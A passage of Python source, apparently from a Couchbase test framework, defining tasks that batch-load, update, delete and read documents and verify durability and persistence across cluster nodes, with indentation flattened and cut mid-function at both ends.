scope=CbServer.default_scope,
collection=CbServer.default_collection,
track_failures=True,
skip_read_success_results=False,
preserve_expiry=None, sdk_retry_strategy=None):
super(LoadDocumentsTask, self).__init__(
cluster, bucket, client, batch_size=batch_size,
timeout_secs=timeout_secs,
time_unit=time_unit,
compression=compression,
retries=retries, suppress_error_table=suppress_error_table,
sdk_client_pool=sdk_client_pool,
scope=scope, collection=collection,
preserve_expiry=preserve_expiry,
sdk_retry_strategy=sdk_retry_strategy)
self.thread_name = "LoadDocs_%s_%s_%s_%s_%s_%s" \
% (task_identifier,
op_type,
durability,
generator._doc_gen.start,
generator._doc_gen.end,
time.time())
self.generator = generator
self.skip_doc_gen_value = False
self.op_type = op_type
if self.op_type in [DocLoading.Bucket.DocOps.DELETE,
DocLoading.Bucket.DocOps.TOUCH,
DocLoading.Bucket.DocOps.READ]:
self.skip_doc_gen_value = True
self.exp = exp
self.abs_exp = self.exp
self.random_exp = random_exp
self.exp_unit = exp_unit
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.num_loaded = 0
self.durability = durability
self.fail = dict()
self.success = dict()
self.skip_read_on_error = skip_read_on_error
self.track_failures = track_failures
self.skip_read_success_results = skip_read_success_results
if proxy_client:
self.log.debug("Changing client to proxy %s:%s..."
% (proxy_client.host, proxy_client.port))
self.client = proxy_client
def has_next(self):
return self.generator.has_next()
def next(self, override_generator=None):
doc_gen = override_generator or self.generator
key_value = doc_gen.next_batch(self.skip_doc_gen_value)
if self.random_exp:
self.exp = random.randint(self.abs_exp / 2, self.abs_exp)
if self.sdk_client_pool is not None:
self.client = \
self.sdk_client_pool.get_client_for_bucket(self.bucket,
self.scope,
self.collection)
if self.op_type == DocLoading.Bucket.DocOps.CREATE:
success, fail = self.batch_create(
key_value,
persist_to=self.persist_to, replicate_to=self.replicate_to,
doc_type=self.generator.doc_type, durability=self.durability,
skip_read_on_error=self.skip_read_on_error)
if self.track_failures:
self.fail.update(fail)
elif self.op_type == DocLoading.Bucket.DocOps.UPDATE:
success, fail = self.batch_update(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
doc_type=self.generator.doc_type,
durability=self.durability,
skip_read_on_error=self.skip_read_on_error)
if self.track_failures:
self.fail.update(fail)
elif self.op_type == DocLoading.Bucket.DocOps.REPLACE:
success, fail = self.batch_replace(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
doc_type=self.generator.doc_type,
durability=self.durability,
skip_read_on_error=self.skip_read_on_error)
if self.track_failures:
self.fail.update(fail)
elif self.op_type == DocLoading.Bucket.DocOps.DELETE:
success, fail = self.batch_delete(key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability)
if self.track_failures:
self.fail.update(fail)
elif self.op_type == DocLoading.Bucket.DocOps.TOUCH:
success, fail = self.batch_touch(key_value,
exp=self.exp)
if self.track_failures:
self.fail.update(fail)
elif self.op_type == DocLoading.Bucket.DocOps.READ:
success, fail = self.batch_read(dict(key_value).keys())
if self.track_failures:
self.fail.update(fail)
if not self.skip_read_success_results:
self.success.update(success)
else:
self.set_exception(Exception("Bad operation: %s" % self.op_type))
if self.sdk_client_pool is not None:
self.sdk_client_pool.release_client(self.client)
self.client = None
self.docs_loaded += len(key_value)
class LoadSubDocumentsTask(GenericLoadingTask):
def __init__(self, cluster, bucket, client, generator,
op_type, exp, create_paths=False,
xattr=False,
exp_unit="seconds", flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1, timeout_secs=5,
compression=None, retries=5,
durability="", task_identifier="",
sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
skip_read_success_results=False,
preserve_expiry=None,
sdk_retry_strategy=None):
super(LoadSubDocumentsTask, self).__init__(
cluster, bucket, client, batch_size=batch_size,
timeout_secs=timeout_secs,
time_unit=time_unit, compression=compression,
sdk_client_pool=sdk_client_pool,
scope=scope, collection=collection,
preserve_expiry=preserve_expiry,
sdk_retry_strategy=sdk_retry_strategy)
self.thread_name = "LoadSubDocsTask-%s_%s_%s_%s_%s" % (
task_identifier,
generator._doc_gen.start,
generator._doc_gen.end,
op_type,
durability)
self.generator = generator
self.skip_doc_gen_value = False
self.op_type = op_type
self.exp = exp
self.create_path = create_paths
self.xattr = xattr
self.exp_unit = exp_unit
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.num_loaded = 0
self.durability = durability
self.fail = dict()
self.success = dict()
self.skip_read_success_results = skip_read_success_results
def has_next(self):
return self.generator.has_next()
def next(self, override_generator=None):
doc_gen = override_generator or self.generator
key_value = doc_gen.next_batch(self.skip_doc_gen_value)
if self.sdk_client_pool is not None:
self.client = \
self.sdk_client_pool.get_client_for_bucket(self.bucket,
self.scope,
self.collection)
if self.op_type == DocLoading.Bucket.SubDocOps.INSERT:
success, fail = self.batch_sub_doc_insert(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
create_path=self.create_path,
xattr=self.xattr)
self.fail.update(fail)
# self.success.update(success)
elif self.op_type == DocLoading.Bucket.SubDocOps.UPSERT:
success, fail = self.batch_sub_doc_upsert(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
create_path=self.create_path,
xattr=self.xattr)
self.fail.update(fail)
# self.success.update(success)
elif self.op_type == DocLoading.Bucket.SubDocOps.REMOVE:
success, fail = self.batch_sub_doc_remove(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
xattr=self.xattr)
self.fail.update(fail)
# self.success.update(success)
elif self.op_type == "replace":
success, fail = self.batch_sub_doc_replace(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
xattr=self.xattr)
self.fail.update(fail)
# self.success.update(success)
elif self.op_type in ['read', 'lookup']:
success, fail = self.batch_sub_doc_read(key_value,
xattr=self.xattr)
self.fail.update(fail)
if not self.skip_read_success_results:
self.success.update(success)
else:
self.set_exception(Exception("Bad operation type: %s"
% self.op_type))
self.docs_loaded += len(key_value)
if self.sdk_client_pool is not None:
self.sdk_client_pool.release_client(self.client)
self.client = None
class Durability(Task):
def __init__(self, cluster, task_manager, bucket, clients, generator,
op_type, exp, exp_unit="seconds", flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1,
timeout_secs=5, compression=None, process_concurrency=8,
print_ops_rate=True, retries=5, durability="",
majority_value=0, check_persistence=False,
sdk_retry_strategy=None):
super(Durability, self).__init__("DurabilityDocumentsMainTask_%s_%s"
% (bucket, time.time()))
self.majority_value = majority_value
self.fail = dict()
# self.success = dict()
self.create_failed = {}
self.update_failed = {}
self.delete_failed = {}
self.sdk_acked_curd_failed = {}
self.sdk_exception_crud_succeed = {}
self.sdk_acked_pers_failed = {}
self.sdk_exception_pers_succeed = {}
self.cluster = cluster
self.exp = exp
self.exp_unit = exp_unit
self.durability = durability
self.check_persistence = check_persistence
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.timeout_secs = timeout_secs
self.compression = compression
self.process_concurrency = process_concurrency
self.clients = clients
self.task_manager = task_manager
self.batch_size = batch_size
self.generator = generator
self.op_types = None
self.buckets = None
self.print_ops_rate = print_ops_rate
self.retries = retries
self.sdk_retry_strategy = sdk_retry_strategy
self.tasks = list()
if isinstance(op_type, list):
self.op_types = op_type
else:
self.op_type = op_type
if isinstance(bucket, list):
self.buckets = bucket
else:
self.bucket = bucket
def call(self):
generators = list()
gen_start = int(self.generator.start)
gen_end = max(int(self.generator.end), 1)
gen_range = max(int((
self.generator.end - self.generator.start) / self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(self.generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > self.generator.end:
partition_gen.end = self.generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
i = 0
for generator in generators:
task = self.Loader(
self.cluster, self.bucket, self.clients[i], generator,
self.op_type, self.exp, self.exp_unit, self.flag,
majority_value=self.majority_value,
persist_to=self.persist_to, replicate_to=self.replicate_to,
time_unit=self.time_unit, batch_size=self.batch_size,
timeout_secs=self.timeout_secs,
compression=self.compression,
instance_num=i, durability=self.durability,
check_persistence=self.check_persistence,
sdk_retry_strategy=self.sdk_retry_strategy)
self.tasks.append(task)
i += 1
try:
for task in self.tasks:
self.task_manager.add_new_task(task)
for task in self.tasks:
self.task_manager.get_task_result(task)
if task.__class__ == self.Loader:
self.create_failed.update(task.create_failed)
self.update_failed.update(task.update_failed)
self.delete_failed.update(task.delete_failed)
self.sdk_acked_curd_failed.update(
task.sdk_acked_curd_failed)
self.sdk_exception_crud_succeed.update(
task.sdk_exception_crud_succeed)
self.sdk_acked_pers_failed.update(
task.sdk_acked_pers_failed)
self.sdk_exception_pers_succeed.update(
task.sdk_exception_pers_succeed)
except Exception as e:
self.set_exception(e)
finally:
self.log.debug("=== Tasks in DurabilityDocumentsMainTask pool ===")
self.task_manager.print_tasks_in_pool()
self.log.debug("=================================================")
for task in self.tasks:
self.task_manager.stop_task(task)
for client in self.clients:
client.close()
class Loader(GenericLoadingTask):
"""
1. Start inserting data into buckets
2. Keep updating the write offset
3. Start the reader thread
4. Keep track of non durable documents
"""
def __init__(self, cluster, bucket, client, generator, op_type,
exp, exp_unit,
flag=0, majority_value=0, persist_to=0, replicate_to=0,
time_unit="seconds",
batch_size=1, timeout_secs=5,
compression=None, retries=5,
instance_num=0, durability="", check_persistence=False,
sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
sdk_retry_strategy=None):
super(Durability.Loader, self).__init__(
cluster, bucket, client, batch_size=batch_size,
timeout_secs=timeout_secs,
compression=compression,
sdk_client_pool=sdk_client_pool,
scope=scope, collection=collection,
sdk_retry_strategy=sdk_retry_strategy)
self.thread_name = "DurableDocLoaderTask_%d_%s_%d_%d_%s" \
% (instance_num, bucket,
generator._doc_gen.start,
generator._doc_gen.end,
op_type)
self.generator = generator
self.op_type = op_type
self.exp = exp
self.exp_unit = exp_unit
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.instance = instance_num
self.durability = durability
self.check_persistence = check_persistence
self.bucket = bucket
self.tasks = []
self.write_offset = self.generator._doc_gen.start
self.majority_value = majority_value
self.create_failed = {}
self.update_failed = {}
self.delete_failed = {}
self.docs_to_be_updated = {}
self.docs_to_be_deleted = {}
self.sdk_acked_curd_failed = {}
self.sdk_exception_crud_succeed = {}
self.sdk_acked_pers_failed = {}
self.sdk_exception_pers_succeed = {}
self.test_log.debug("Instance %s: doc loading starts from %s"
% (self.instance, generator._doc_gen.start))
self.task_manager = TaskManager()
def call(self):
self.start_task()
if self.check_persistence:
persistence = threading.Thread(target=self.Persistence)
persistence.start()
reader = threading.Thread(target=self.Reader)
reader.start()
self.log.debug("Starting loader thread '%s'" % self.thread_name)
try:
while self.has_next():
self.next()
except Exception as e:
self.set_exception(Exception(e.message))
self.log.debug("Loader thread '%s' completed" % self.thread_name)
self.log.debug("== Tasks in DurabilityDocumentLoaderTask pool ==")
self.task_manager.print_tasks_in_pool()
if self.check_persistence:
persistence.join()
reader.join()
self.complete_task()
def has_next(self):
return self.generator.has_next()
def next(self, override_generator=None):
doc_gen = override_generator or self.generator
key_value = doc_gen.next_batch()
if self.op_type == 'create':
_, f_docs = self.batch_create(
key_value, persist_to=self.persist_to,
replicate_to=self.replicate_to,
doc_type=self.generator.doc_type,
durability=self.durability)
if len(f_docs) > 0:
self.create_failed.update(f_docs)
elif self.op_type == 'update':
keys_for_update = list()
for item in key_value:
keys_for_update.append(item.getT1())
self.docs_to_be_updated.update(
self.batch_read(keys_for_update)[0])
_, f_docs = self.batch_update(
key_value, persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
doc_type=self.generator.doc_type)
self.update_failed.update(f_docs)
elif self.op_type == 'delete':
keys_for_update = list()
for item in key_value:
keys_for_update.append(item.getT1())
self.docs_to_be_deleted.update(
self.batch_read(keys_for_update)[0])
_, fail = self.batch_delete(
key_value,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability)
self.delete_failed.update(fail)
else:
self.set_exception(Exception("Bad operation type: %s"
% self.op_type))
self.write_offset += len(key_value)
def Persistence(self):
partition_gen = copy.deepcopy(self.generator._doc_gen)
partition_gen.start = self.generator._doc_gen.start
partition_gen.itr = self.generator._doc_gen.start
partition_gen.end = self.generator._doc_gen.end
self.generator_persist = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
self.start = self.generator._doc_gen.start
self.end = self.generator._doc_gen.end
self.generator_persist._doc_gen.itr = self.generator_persist._doc_gen.start
self.persistence_offset = self.generator_persist._doc_gen.start
shells = {}
for server in self.cluster.servers:
shell = RemoteMachineShellConnection(server)
shells.update({server.ip: Cbstats(shell)})
while True:
if self.persistence_offset < self.write_offset or self.persistence_offset == self.end:
self.test_log.debug(
"Persistence: ReadOffset=%s, WriteOffset=%s, Reader: FinalOffset=%s"
% (self.persistence_offset,
self.write_offset,
self.end))
if self.generator_persist._doc_gen.has_next():
doc = self.generator_persist._doc_gen.next()
key, val = doc[0], doc[1]
vBucket = (((zlib.crc32(key)) >> 16) & 0x7fff) & (
len(self.bucket.vbuckets) - 1)
nodes = [self.bucket.vbuckets[vBucket].master]
if self.durability \
== Bucket.DurabilityLevel.PERSIST_TO_MAJORITY:
nodes += self.bucket.vbuckets[vBucket].replica
count = 0
if self.op_type == 'create':
try:
for node in nodes:
key_stat = shells[
node.split(":")[0]].vkey_stat(
self.bucket.name, key)
if key_stat["is_dirty"].lower() == "true":
self.test_log.error(
"Node: %s, Key: %s, key_is_dirty = %s" % (
node.split(":")[0], key,
key_stat["is_dirty"]))
else:
self.test_log.info(
"Node: %s, Key: %s, key_is_dirty = %s" % (
node.split(":")[0], key,
key_stat["is_dirty"]))
count += 1
except:
pass
if key not in self.create_failed.keys():
'''
this condition make sure that document is
persisted in alleast 1 node
'''
if count == 0:
# if count < self.majority_value:
self.sdk_acked_pers_failed.update(
{key: val})
self.test_log.error(
"Key isn't persisted although SDK reports Durable, Key = %s" % key)
elif count > 0:
self.test_log.error(
"SDK threw exception but document is present in the Server -> %s" % key)
self.sdk_exception_crud_succeed.update(
{key: val})
else:
self.test_log.error(
"Document is rolled back to nothing during create -> %s" % (
key))
if self.op_type == 'update':
if key not in self.update_failed[
self.instance].keys():
try:
for node in nodes:
key_stat = shells[
node.split(":")[0]].vkey_stat(
self.bucket.name, key)
if key_stat[
"is_dirty"].lower() == "true":
self.test_log.error(
"Node: %s, Key: %s, key_is_dirty = %s" % (
node.split(":")[0], key,
key_stat["is_dirty"]))
else:
self.test_log.debug(
"Node: %s, Key: %s, key_is_dirty = %s" % (
node.split(":")[0], key,
key_stat["is_dirty"]))
count += 1
except:
pass
if not count > 0:
self.sdk_acked_pers_failed.update(
{key: val})
self.test_log.error(
"Key isn't persisted although SDK reports Durable, Key = %s getFromAllReplica = %s" % key)
if self.op_type == 'delete':
for node in nodes:
try:
key_stat = shells[
node.split(":")[0]].vkey_stat(
self.bucket.name, key)
if key_stat["is_dirty"].lower() == "true":
self.test_log.error(
"Node: %s, Key: %s, key_is_dirty = %s" % (
node.split(":")[0], key,
key_stat["is_dirty"]))
else:
self.test_log.debug(
"Node: %s, Key: %s, key_is_dirty = %s" % (
node.split(":")[0], key,
key_stat["is_dirty"]))
count += 1
except Exception as e:
pass
if key not in self.delete_failed[
self.instance].keys():
if count == (self.bucket.replicaNumber + 1):
# if count > (self.bucket.replicaNumber+1 - self.majority_value):
self.sdk_acked_pers_failed.update(
{key: val})
self.test_log.error(
"Key isn't Persisted-Delete although SDK reports Durable, Key = %s getFromAllReplica = %s" % key)
elif count >= self.majority_value:
self.test_log.error(
"Document is rolled back to original during delete -> %s" % (
key))
if self.persistence_offset == self.end:
self.log.warning("Breaking thread persistence!!")
break
self.persistence_offset = self.write_offset
for key, cbstat in shells.items():
cbstat.shellConn.disconnect()
def Reader(self):
partition_gen = copy.deepcopy(self.generator._doc_gen)
partition_gen.start = self.generator._doc_gen.start
partition_gen.itr = self.generator._doc_gen.start
partition_gen.end = self.generator._doc_gen.end
self.generator_reader = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
self.start = self.generator._doc_gen.start
self.end = self.generator._doc_gen.end
self.read_offset = self.generator._doc_gen.start
while True:
if self.read_offset < self.write_offset or self.read_offset == self.end:
self.test_log.debug(
"Reader: ReadOffset=%s, %sOffset=%s, Reader: FinalOffset=%s"
% (self.read_offset, self.op_type, self.write_offset,
self.end))
if self.generator_reader._doc_gen.has_next():
doc = self.generator_reader._doc_gen.next()
key, val = doc[0], doc[1]
if self.op_type == 'create':
result = self.client.get_from_all_replicas(key)
self.test_log.debug(
"Key = %s getFromAllReplica = %s" % (
key, result))
if key not in self.create_failed.keys():
if len(result) == 0:
# if len(result) < self.majority_value:
self.sdk_acked_curd_failed.update(
{key: val})
self.test_log.error(
"Key isn't durable although SDK reports Durable, Key = %s getFromAllReplica = %s"
% (key, result))
elif len(result) > 0:
if not (
SDKException.DurabilityAmbiguousException in
self.create_failed[key]["error"] or
SDKException.TimeoutException in
self.create_failed[key]["error"]):
self.test_log.error(
"SDK threw exception but document is present in the Server -> %s:%s"
% (key, result))
self.sdk_exception_crud_succeed.update(
{key: val})
else:
self.test_log.debug(
"Document is rolled back to nothing during create -> %s:%s"
% (key, result))
if self.op_type == 'update':
result = self.client.get_from_all_replicas(key)
if key not in self.update_failed.keys():
if len(result) == 0:
# if len(result) < self.majority_value:
self.sdk_acked_curd_failed.update(
{key: val})
self.test_log.error(
"Key isn't durable although SDK reports Durable, Key = %s getFromAllReplica = %s"
% (key, result))
else:
# elif len(result) >= self.majority_value:
temp_count = 0
for doc in result:
if doc["value"] == \
self.docs_to_be_updated[key][
"value"]:
self.test_log.error(
"Doc content is not updated yet on few nodes, Key = %s getFromAllReplica = %s"
% (key, result))
else:
temp_count += 1
'''
This make sure that value has been updated
on at least 1 node
'''
if temp_count == 0:
# if temp_count < self.majority_value:
self.sdk_acked_curd_failed.update(
{key: val})
else:
for doc in result:
if doc["value"] != \
self.docs_to_be_updated[key][
"value"]:
self.sdk_exception_crud_succeed.update(
{key: val})
self.test_log.error(
"Doc content is updated although SDK threw exception, Key = %s getFromAllReplica = %s"
% (key, result))
if self.op_type == 'delete':
result = self.client.get_from_all_replicas(key)
if key not in self.delete_failed.keys():
if len(result) > self.bucket.replicaNumber:
self.sdk_acked_curd_failed.update(result[0])
self.test_log.error(
"Key isn't durably deleted although SDK reports Durable, Key = %s getFromAllReplica = %s"
% (key, result))
elif len(result) == self.bucket.replicaNumber + 1:
self.test_log.warn(
"Document is rolled back to original during delete -> %s:%s"
% (key, result))
if self.read_offset == self.end:
self.test_log.fatal("BREAKING!!")
break
self.read_offset += 1
class LoadDocumentsGeneratorsTask(Task):
def __init__(self, cluster, task_manager, bucket, clients, generators,
op_type, exp, exp_unit="seconds", random_exp=False, flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1,
timeout_secs=5, compression=None, process_concurrency=8,
print_ops_rate=True, retries=5, durability="",
task_identifier="", skip_read_on_error=False,
suppress_error_table=False,
sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
monitor_stats=["doc_ops"],
track_failures=True,
preserve_expiry=None,
sdk_retry_strategy=None):
super(LoadDocumentsGeneratorsTask, self).__init__(
"LoadDocsGen_%s_%s_%s_%s_%s"
% (bucket, scope, collection, task_identifier, time.time()))
self.cluster = cluster
self.exp = exp
self.random_exp = random_exp
self.exp_unit = exp_unit
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.timeout_secs = timeout_secs
self.compression = compression
self.process_concurrency = process_concurrency
self.clients = clients
self.sdk_client_pool = sdk_client_pool
self.task_manager = task_manager
self.batch_size = batch_size
self.generators = generators
self.input_generators = generators
self.op_types = None
self.buckets = None
self.print_ops_rate = print_ops_rate
self.retries = retries
self.durability = durability
self.task_identifier = task_identifier
self.skip_read_on_error = skip_read_on_error
self.suppress_error_table = suppress_error_table
self.monitor_stats = monitor_stats
self.scope = scope
self.collection = collection
self.preserve_expiry = preserve_expiry
self.sdk_retry_strategy = sdk_retry_strategy
if isinstance(op_type, list):
self.op_types = op_type
else:
self.op_type = op_type
if isinstance(bucket, list):
self.buckets = bucket
else:
self.bucket = bucket
self.num_loaded = 0
self.track_failures = track_failures
self.fail = dict()
self.success = dict()
self.print_ops_rate_tasks = list()
def call(self):
self.start_task()
buckets_for_ops_rate_task = list()
if self.op_types:
if len(self.op_types) != len(self.generators):
self.set_exception(
Exception("Not all generators have op_type!"))
self.complete_task()
if self.buckets:
if len(self.op_types) != len(self.buckets):
self.set_exception(
Exception("Not all generators have bucket specified!"))
self.complete_task()
iterator = 0
tasks = list()
for generator in self.generators:
if self.op_types:
self.op_type = self.op_types[iterator]
if self.buckets:
self.bucket = self.buckets[iterator]
tasks.extend(self.get_tasks(generator))
iterator += 1
if self.print_ops_rate:
if self.buckets:
buckets_for_ops_rate_task = self.buckets
else:
buckets_for_ops_rate_task = [self.bucket]
for bucket in buckets_for_ops_rate_task:
bucket.stats.manage_task(
"start", self.task_manager,
cluster=self.cluster,
bucket=bucket,
monitor_stats=self.monitor_stats,
sleep=1)
try:
for task in tasks:
self.task_manager.add_new_task(task)
for task in tasks:
try:
self.task_manager.get_task_result(task)
self.log.debug("Items loaded in task {} are {}"
.format(task.thread_name, task.docs_loaded))
i = 0
while task.docs_loaded < (task.generator._doc_gen.end -
task.generator._doc_gen.start) \
and i < 60:
sleep(1, "Bug in java futures task. "
"Items loaded in task %s: %s"
% (task.thread_name, task.docs_loaded),
log_type="infra")
i += 1
except Exception as e:
self.test_log.error(e)
finally:
self.success.update(task.success)
if self.track_failures:
self.fail.update(task.fail)
if task.fail.__len__() != 0:
target_log = self.test_log.error
else:
target_log = self.test_log.debug
target_log("Failed to load {} docs from {} to {}"
.format(task.fail.__len__(),
task.generator._doc_gen.start,
task.generator._doc_gen.end))
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
finally:
if self.print_ops_rate:
for bucket in buckets_for_ops_rate_task:
bucket.stats.manage_task("stop", self.task_manager)
self.log.debug("========= Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("======================================")
for task in tasks:
self.task_manager.stop_task(task)
self.log.debug("Task '{0}' complete. Loaded {1} items"
.format(task.thread_name, task.docs_loaded))
if self.sdk_client_pool is None:
for client in self.clients:
client.close()
self.complete_task()
return self.fail
def get_tasks(self, generator):
generators = []
tasks = []
gen_start = int(generator.start)
gen_end = int(generator.end)
gen_range = max(
int((generator.end - generator.start) / self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for i in range(0, len(generators)):
task = LoadDocumentsTask(
self.cluster, self.bucket, self.clients[i], generators[i],
self.op_type, self.exp, self.random_exp, self.exp_unit,
self.flag,
persist_to=self.persist_to, replicate_to=self.replicate_to,
time_unit=self.time_unit, batch_size=self.batch_size,
timeout_secs=self.timeout_secs,
compression=self.compression,
durability=self.durability,
task_identifier=self.thread_name,
skip_read_on_error=self.skip_read_on_error,
suppress_error_table=self.suppress_error_table,
sdk_client_pool=self.sdk_client_pool,
scope=self.scope, collection=self.collection,
track_failures=self.track_failures,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
tasks.append(task)
return tasks
class LoadSubDocumentsGeneratorsTask(Task):
def __init__(self, cluster, task_manager, bucket, clients,
generators,
op_type, exp, create_paths=False,
xattr=False, exp_unit="seconds", flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1,
timeout_secs=5, compression=None,
process_concurrency=8,
print_ops_rate=True, retries=5, durability="",
task_identifier="",
sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
preserve_expiry=None, sdk_retry_strategy=None):
thread_name = "SubDocumentsLoadGenTask_%s_%s_%s_%s_%s" \
% (task_identifier,
bucket.name,
op_type,
durability,
time.time())
super(LoadSubDocumentsGeneratorsTask, self).__init__(thread_name)
self.cluster = cluster
self.exp = exp
self.create_path = create_paths
self.xattr = xattr
self.exp_unit = exp_unit
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.timeout_secs = timeout_secs
self.compression = compression
self.process_concurrency = process_concurrency
self.clients = clients
self.task_manager = task_manager
self.batch_size = batch_size
self.generators = generators
self.input_generators = generators
self.op_types = None
self.buckets = None
self.print_ops_rate = print_ops_rate
self.retries = retries
self.durability = durability
self.sdk_client_pool = sdk_client_pool
self.scope = scope
self.collection = collection
self.preserve_expiry = preserve_expiry
self.sdk_retry_strategy = sdk_retry_strategy
if isinstance(op_type, list):
self.op_types = op_type
else:
self.op_type = op_type
if isinstance(bucket, list):
self.buckets = bucket
else:
self.bucket = bucket
self.print_ops_rate_tasks = list()
self.num_loaded = 0
self.fail = dict()
self.success = dict()
def call(self):
self.start_task()
buckets_for_ops_rate_task = list()
if self.op_types:
if len(self.op_types) != len(self.generators):
self.set_exception(
Exception("Not all generators have op_type!"))
self.complete_task()
if self.buckets:
if len(self.op_types) != len(self.buckets):
self.set_exception(
Exception(
"Not all generators have bucket specified!"))
self.complete_task()
iterator = 0
tasks = list()
for generator in self.generators:
if self.op_types:
self.op_type = self.op_types[iterator]
if self.buckets:
self.bucket = self.buckets[iterator]
tasks.extend(self.get_tasks(generator))
iterator += 1
if self.print_ops_rate:
if self.buckets:
buckets_for_ops_rate_task = self.buckets
else:
buckets_for_ops_rate_task = [self.bucket]
for bucket in buckets_for_ops_rate_task:
bucket.stats.manage_task(
"start", self.task_manager,
cluster=self.cluster,
bucket=bucket,
monitor_stats=["doc_ops"],
sleep=1)
try:
for task in tasks:
self.task_manager.add_new_task(task)
for task in tasks:
try:
self.task_manager.get_task_result(task)
except Exception as e:
self.log.error(e)
finally:
self.fail.update(task.fail)
self.success.update(task.success)
self.log.warning("Failed to load {} sub_docs from {} "
"to {}"
.format(task.fail.__len__(),
task.generator._doc_gen.start,
task.generator._doc_gen.end))
except Exception as e:
self.log.error(e)
self.set_exception(e)
finally:
if self.print_ops_rate:
for bucket in buckets_for_ops_rate_task:
bucket.stats.manage_task("stop", self.task_manager)
self.log.debug("===========Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("=======================================")
for task in tasks:
self.task_manager.stop_task(task)
if self.sdk_client_pool is None:
for client in self.clients:
client.close()
self.complete_task()
return self.fail
def get_tasks(self, generator):
generators = list()
tasks = list()
gen_start = int(generator.start)
gen_end = int(generator.end)
gen_range = max(int((generator.end - generator.start) /
self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
if not isinstance(generator, SubdocDocumentGenerator):
self.set_exception("Document generator needs to be of"
" type SubdocDocumentGenerator")
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for i in range(0, len(generators)):
task = LoadSubDocumentsTask(
self.cluster, self.bucket,
self.clients[i], generators[i],
self.op_type, self.exp,
create_paths=self.create_path,
xattr=self.xattr,
exp_unit=self.exp_unit,
flag=self.flag,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
time_unit=self.time_unit,
batch_size=self.batch_size,
timeout_secs=self.timeout_secs,
compression=self.compression,
retries=self.retries,
durability=self.durability,
scope=self.scope,
collection=self.collection,
sdk_client_pool=self.sdk_client_pool,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
tasks.append(task)
return tasks
class ContinuousDocOpsTask(Task):
def __init__(self, cluster, task_manager, bucket, clients, generator,
op_type="update", exp=0, flag=0, persist_to=0, replicate_to=0,
durability="", time_unit="seconds",
batch_size=1,
timeout_secs=5, compression=None,
process_concurrency=4,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
sdk_client_pool=None, sdk_retry_strategy=None):
super(ContinuousDocOpsTask, self).__init__(
"ContDocOps_%s_%s_%s_%s"
% (bucket.name, scope, collection, time.time()))
self.cluster = cluster
self.exp = exp
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.durability = durability
self.time_unit = time_unit
self.timeout_secs = timeout_secs
self.compression = compression
self.process_concurrency = process_concurrency
self.clients = clients
self.sdk_client_pool = sdk_client_pool
self.task_manager = task_manager
self.batch_size = batch_size
self.generator = generator
self.buckets = None
# self.success = dict()
self.fail = dict()
self.key = self.generator.name
self.doc_start_num = self.generator.start
self.doc_end_num = self.generator.end
self.doc_type = self.generator.doc_type
self.op_type = op_type
self.sdk_retry_strategy = sdk_retry_strategy
self.itr_count = 0
self.__stop_updates = False
if isinstance(bucket, list):
self.buckets = bucket
else:
self.bucket = bucket
self.scope = scope
self.collection = collection
def end_task(self):
self.__stop_updates = True
def _start_doc_ops(self, bucket):
self.test_log.info("Performing doc ops '%s' on %s" % (self.op_type,
bucket.name))
while not self.__stop_updates:
self.itr_count += 1
doc_gens = list()
doc_tasks = list()
task_instance = 1
for _ in self.clients:
doc_gens.append(copy.deepcopy(self.generator))
for index, generator in enumerate(doc_gens):
